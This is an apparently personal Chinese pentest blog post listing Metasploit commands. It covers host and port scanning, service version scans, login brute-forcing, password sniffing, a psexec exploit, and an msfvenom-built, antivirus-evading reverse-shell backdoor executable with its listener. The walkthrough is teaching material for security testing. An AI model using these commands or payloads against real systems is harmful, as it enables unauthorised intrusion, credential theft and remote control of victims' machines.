注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

抖m型丧病女仆的宅窝

专注渗透测试|无线安全|kali_linux|一个宅女的小窝

 
 
 

日志

 
 

几个自己常用的metasploit模块  

2016-02-02 06:10:46|  分类: metasploit |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
几个自己常用的metasploit模块 - Saya - 抖m型丧病女仆的宅窝
 
探测主机存活
use auxiliary/scanner/discovery/arp_sweep
set RHOSTS IP
set THREADS 线程
exploit
几个自己常用的metasploit模块 - Saya - 抖m型丧病女仆的宅窝
 
端口扫描
search portscan
use auxiliary/scanner/portscan/syn
set RHOSTS IP
set  THREADS 线程
exploit
几个自己常用的metasploit模块 - Saya - 抖m型丧病女仆的宅窝
 

服务扫描
其实都大同小异 只要变一下服务的名字就可以了 search 服务名字_version
如:http服务
search http_version
use use auxiliary/scanner/http/http_version
set RHOSTS IP
set THREADS 线程
exploit
几个自己常用的metasploit模块 - Saya - 抖m型丧病女仆的宅窝
-------------------------------萌萌哒分割线----------------------------------------
其他的:

telnet服务扫描

use auxiliary/scanner/telnet/telnet_version

set RHOSTS 192.168.80.0/24

set THREADS 100

run

 

ssh服务扫描

use auxiliary/scanner/ssh/ssh_version

set RHOSTS 192.168.80.0/24

set THREADS 100

run

 

oracle数据库服务扫描

use auxiliary/scanner/oracle/tnslsnr_version

set RHOSTS 192.168.80.0/24

set THREADS 100

run

-------------------------------萌萌哒分割线----------------------------------------
口令枚举
口令枚举和服务扫描也是一样的
只要变一下要枚举的服务的名字就可以了 search 服务名字_login
如http-get的枚举
use use auxiliary/scanner/http/http_login
set USER_FILE 用户字典路径
set PASS_FILE 密码字典路径
set RHOSTS IP
set PORT 端口
set THREADS 线程
exploit
几个自己常用的metasploit模块 - Saya - 抖m型丧病女仆的宅窝

密码嗅探
use auxiliary/sniffer/psnuffle
exploit
几个自己常用的metasploit模块 - Saya - 抖m型丧病女仆的宅窝
 
漏洞利用
psexec
use exploit/windows/smb/psexec
set RHOST IP
set SMBUser 用户名
set SMBPass 密码
set payload windows/meterpreter/reverse_tcp
set LHOST 攻击机IP
set LPORT 端口
exploit
几个自己常用的metasploit模块 - Saya - 抖m型丧病女仆的宅窝
我这里登陆失败了 并没有获得一个shell

后门渗透windows
先制作一个payload
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=攻击机ip LPORT=端口 -f exe -o /root/Desktop/saya.exe
 
-p:指定一个payload
-e :指定一个免杀encode
-i :编译次数
-f : 生成文件格式
-o :保存目录
几个自己常用的metasploit模块 - Saya - 抖m型丧病女仆的宅窝

启动metasploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 攻击机ip 要和上面生成的对应(用映射的朋友可以上面生成公网ip 然后这里设置内网ip)
set LPORT 端口(和上面保持一致)
exploit

几个自己常用的metasploit模块 - Saya - 抖m型丧病女仆的宅窝
 
 转载请注明原文地址:http://lsaya.blog.163.com/
  评论这张
 
阅读(130)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017